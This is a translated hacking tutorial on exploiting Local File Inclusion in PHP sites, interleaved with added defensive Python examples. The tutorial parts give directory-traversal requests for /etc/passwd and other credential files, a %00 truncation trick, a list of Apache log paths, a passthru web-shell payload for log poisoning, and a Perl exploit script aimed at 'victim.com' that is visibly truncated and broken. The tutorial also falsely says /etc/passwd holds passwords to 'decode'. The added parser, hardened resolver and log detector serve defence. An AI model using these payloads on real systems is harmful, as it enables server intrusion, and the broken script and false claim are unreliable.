Hello! In this tutorial you will learn how to exploit an LFI vulnerability in a site.
First, let's look at this small piece of PHP code:
Code:
<?php $page = $_GET['page']; include($page); ?>
This is code that should never be used: it is vulnerable to LFI because the $page variable is not sanitized before being passed to include().
OK, now let's take advantage of this vulnerability using the following request:
Code:
site.host/index.php?page=../../../../../../../etc/passwd
If the site is hosted on Unix, the users' passwords are stored in /etc/passwd, and the request above shows us these passwords and the usernames. Now all you have to do is decode the password.
An encrypted password should look something like this:
Code:
username:x:503:100:FullName:/home/username:/bin/sh
In this example the password is x; another example of a password is:
Code:
username:!:503:100:FullName:/home/username:/bin/sh
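What the two sample lines above actually disclose is worth checking before anyone tries to "decode" anything. On every Unix that uses shadow passwords the second field of /etc/passwd is only a placeholder: x means the hash is kept in /etc/shadow (readable by root alone), and ! or * marks an account whose password login is disabled. A real hash appears in this field only on very old or misconfigured systems. The parser below is an added example written for this page, not code from the tutorial; the passwd lines and the hash string are constructed for the demo.

```python
# Added example for this page (not the tutorial's code): parse /etc/passwd-style
# lines and report what the second field really contains. All sample lines below
# are constructed for the demo; the hash string is a fake placeholder.
from typing import Dict, List

SAMPLE_PASSWD = """\
username:x:503:100:FullName:/home/username:/bin/sh
locked:!:504:100:Locked Account:/home/locked:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
legacy:$6$saltsalt$FAKEHASHFORDEMO:505:100:Legacy:/home/legacy:/bin/bash
"""

CATEGORIES = ("shadowed", "locked", "empty", "hash-in-passwd")


def classify_password_field(field: str) -> str:
    """Say what the password field of a passwd entry tells a reader."""
    if field == "x":
        return "shadowed"        # real hash is in /etc/shadow, readable only by root
    if field in ("!", "*", "!!"):
        return "locked"          # not a valid hash: password login is disabled
    if field == "":
        return "empty"           # no password at all, a finding on its own
    return "hash-in-passwd"      # pre-shadow layout: the hash itself is exposed


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split each well-formed line into its seven colon-separated fields."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line: skip rather than guess
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({
            "name": name, "uid": uid, "gid": gid, "home": home, "shell": shell,
            "password_field": classify_password_field(pw),
        })
    return entries


def exposure_report(text: str) -> Dict[str, List[str]]:
    """Group account names by what disclosure of this file gives away about them.

    Only the 'hash-in-passwd' group yields anything to crack; every other group
    discloses usernames, UIDs, home directories and shells, but no secret.
    """
    report: Dict[str, List[str]] = {c: [] for c in CATEGORIES}
    for entry in parse_passwd(text):
        report[entry["password_field"]].append(entry["name"])
    return report


def interactive_accounts(text: str) -> List[str]:
    """Accounts with an interactive login shell: the names a defender should
    watch for follow-on login attempts once this file has leaked."""
    non_interactive = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")
    return [e["name"] for e in parse_passwd(text) if e["shell"] not in non_interactive]


if __name__ == "__main__":
    for category, names in exposure_report(SAMPLE_PASSWD).items():
        print(f"{category:15} {names}")
    print("interactive:", interactive_accounts(SAMPLE_PASSWD))
```

Run on the constructed sample, only the legacy account lands in the hash-in-passwd group; the username line the tutorial shows is shadowed and the ! line is locked, so reading /etc/passwd through an LFI on such a host is a username and layout leak rather than a credential leak.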
Other "places" where you can find passwords, besides /etc/passwd, would be:
Code:
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
If the browser shows that a .php is appended to the end of the included name (so /etc/passwd.php is requested and does not exist), add %00 to the end of the include; the server will drop everything written after the %00.
Example:
Code:
site.host/index.php?file=../../../../../../../../etc/passwd%00
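Here is what the page-include pattern from the start of the tutorial looks like once it is hardened against both the traversal request and the %00 truncation trick just described. This is an added example written for this page, not the tutorial's code: it is a Python stand-in for the PHP logic so the checks can be run on their own, and the pages directory (/var/www/app/pages) and the allowlist of page names are assumptions. The PHP equivalent is a fixed array or switch of permitted page names, plus a realpath() containment check for the case where free-form names must be accepted; note also that PHP releases since 5.3.4 refuse to open a path that contains a NUL byte, so the %00 trick only works against older interpreters.

```python
# Added example for this page (not the tutorial's code): a Python stand-in for a
# hardened version of `include($_GET['page'])`. The pages directory and the
# allowlist are assumptions made for the demo.
import posixpath
from typing import Optional
from urllib.parse import unquote

PAGES_DIR = "/var/www/app/pages"                          # assumed location of includable pages
ALLOWED_PAGES = frozenset({"home", "about", "contact"})   # assumed allowlist of page names


def _decode_and_reject_nul(raw_page: str) -> Optional[str]:
    """URL-decode the parameter and refuse it if it carries a NUL byte (the %00
    truncation trick). Decode first: the byte only appears after decoding."""
    page = unquote(raw_page)
    if "\x00" in page:
        return None
    return page


def resolve_allowlisted(raw_page: str, pages_dir: str = PAGES_DIR) -> Optional[str]:
    """The preferred fix: the parameter selects a name from a fixed allowlist,
    and the file path is built by the application, never from user input."""
    page = _decode_and_reject_nul(raw_page)
    if page is None or page not in ALLOWED_PAGES:
        return None
    return posixpath.join(pages_dir, page + ".php")


def resolve_contained(raw_page: str, pages_dir: str = PAGES_DIR) -> Optional[str]:
    """Fallback when free-form names under pages_dir must be accepted: normalise
    the joined path and require that it still sits inside pages_dir.

    posixpath.normpath collapses '..' segments without touching the filesystem;
    a real deployment would use realpath() so symlinks are resolved as well.
    """
    page = _decode_and_reject_nul(raw_page)
    if page is None:
        return None
    candidate = posixpath.normpath(posixpath.join(pages_dir, page + ".php"))
    # An absolute page name replaces pages_dir in join(); commonpath catches that too.
    if posixpath.commonpath([pages_dir, candidate]) != pages_dir:
        return None
    return candidate


if __name__ == "__main__":
    for probe in ("home", "../../../../../../../etc/passwd",
                  "../../../../../../../../etc/passwd%00", "/etc/passwd"):
        print(f"{probe!r:45} allowlist={resolve_allowlisted(probe)!r:35} "
              f"contained={resolve_contained(probe)!r}")
```

Against the two requests shown in the tutorial both resolvers return None, while a legitimate page name still maps to a file under the pages directory; the containment variant additionally accepts subdirectory names such as sub/page, which the allowlist variant would reject.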
Now we will try to run commands on the server by injecting PHP code into the logs and then executing it.
A few log locations:
Code:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
OK, now let's take a look at the log where requests for pages that do not exist are recorded, and at the following code: <? passthru($_GET[cmd]) ?>. If we type in the browser:
Code:
site.host/<? passthru($_GET[cmd]) ?>
it will obviously show us a page saying that this file does not exist on the server, because the browser automatically URL-encodes the address, and the page we accessed is translated into:
Code:
site.host/%3C?%20passthru($_GET[cmd])%20?>
So we will have to do something else... We can use the following Perl script:
Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="<? passthru(\$_GET[cmd]) ?>";
$log = "../../../../../../../etc/httpd/logs/error_log";
print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print "\nType command to run or exit to end: ";
while($cmd !~ "exit") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
    while ($show = <$socket>)
    print "Type command to run or exit to end: ";
Copy/paste this and save it as ex.pl, but don't forget to change the following things in the exploit:
1) change the site name
2) change the log name and the path to it
3) change index.php= to whatever you want
Run the script and it will ask you which commands to run!!! You're on your own from here!!!
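From the defender's side, every stage of the log-poisoning procedure above leaves a trace in the web server's own logs before any command runs: the traversal reads of /etc/passwd, the %00-terminated variant, the request carrying a raw PHP tag (which the server answers with a 404, exactly the entry the tutorial later includes), and finally the include of an access or error log path. The detector below is an added example written for this page, not code from the tutorial; the Apache-style log lines, the rule names and the regular expressions are constructed for the demo.

```python
# Added example for this page (not the tutorial's code): flag the traversal,
# null-byte and log-poisoning requests described above in Apache-style access
# logs. Sample lines, rule names and patterns are constructed for the demo.
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample log (Apache combined format); not taken from any real server.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=../../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.88"
10.0.0.9 - - [10/Oct/2023:13:56:20 +0000] "GET /index.php?file=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1843 "-" "curl/7.88"
10.0.0.9 - - [10/Oct/2023:13:57:02 +0000] "GET /%3C?%20passthru($_GET[cmd])%20?> HTTP/1.1" 404 210 "-" "curl/7.88"
10.0.0.9 - - [10/Oct/2023:13:57:40 +0000] "GET /index.php?page=../../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "curl/7.88"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the URL-decoded request target, so %3C? and <? match alike.
RULES = [
    ("php-tag-injection", re.compile(r"<\?|passthru\s*\(|system\s*\(|shell_exec\s*\(", re.I)),
    ("null-byte",         re.compile(r"\x00")),
    ("path-traversal",    re.compile(r"\.\.[/\\]")),
    ("log-file-include",  re.compile(r"(access|error)[._]?log", re.I)),
]


def analyze_line(line: str) -> Dict[str, object]:
    """Parse one log line and list the rules its decoded request target triggers."""
    m = REQUEST_RE.match(line)
    if not m:
        return {"parsed": False, "line": line}
    target = unquote(m.group("target"))
    hits = [name for name, rx in RULES if rx.search(target)]
    return {
        "parsed": True, "ip": m.group("ip"), "status": int(m.group("status")),
        "target": target, "hits": hits,
    }


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious line; lines with no rule hits are dropped."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        result = analyze_line(line)
        if result["parsed"] and result["hits"]:
            findings.append(result)
    return findings


def poisoning_sequence(findings: List[Dict[str, object]]) -> List[str]:
    """Client IPs that both sent a PHP tag and later included a log file:
    the two halves of the poisoning technique seen from one source."""
    injected, included = set(), set()
    for f in findings:
        if "php-tag-injection" in f["hits"]:
            injected.add(f["ip"])
        if "log-file-include" in f["hits"] and "path-traversal" in f["hits"]:
            included.add(f["ip"])
    return sorted(injected & included)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ip']:10} {f['status']} {f['hits']}  {f['target']}")
    print("poisoning sequence from:", poisoning_sequence(scan_log(SAMPLE_ACCESS_LOG)))
```

On the constructed sample the benign home request produces nothing, the four probe lines each get the rule hits you would expect, and 10.0.0.9 is reported as the one client that both planted a PHP tag (the 404 entry) and then included a log file through a traversal path. Keying the rules on the decoded target is what makes the %3C?%20passthru form visible; a rule on the raw line would miss it.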
Useful links:
Code:
http://www.milw0rm.com/video/watch.php?id=57
This is a short video tutorial; try to watch it, it is very good.
Proof of Concept (screenshot): http://img355.imageshack.us/my.php?image=sitewe2.jpg
Translation and adaptation, with modifications: vladiii
Filed under: Uncategorized | Tagged: file, inclusion, informatica, lfi, local, n00b, vladii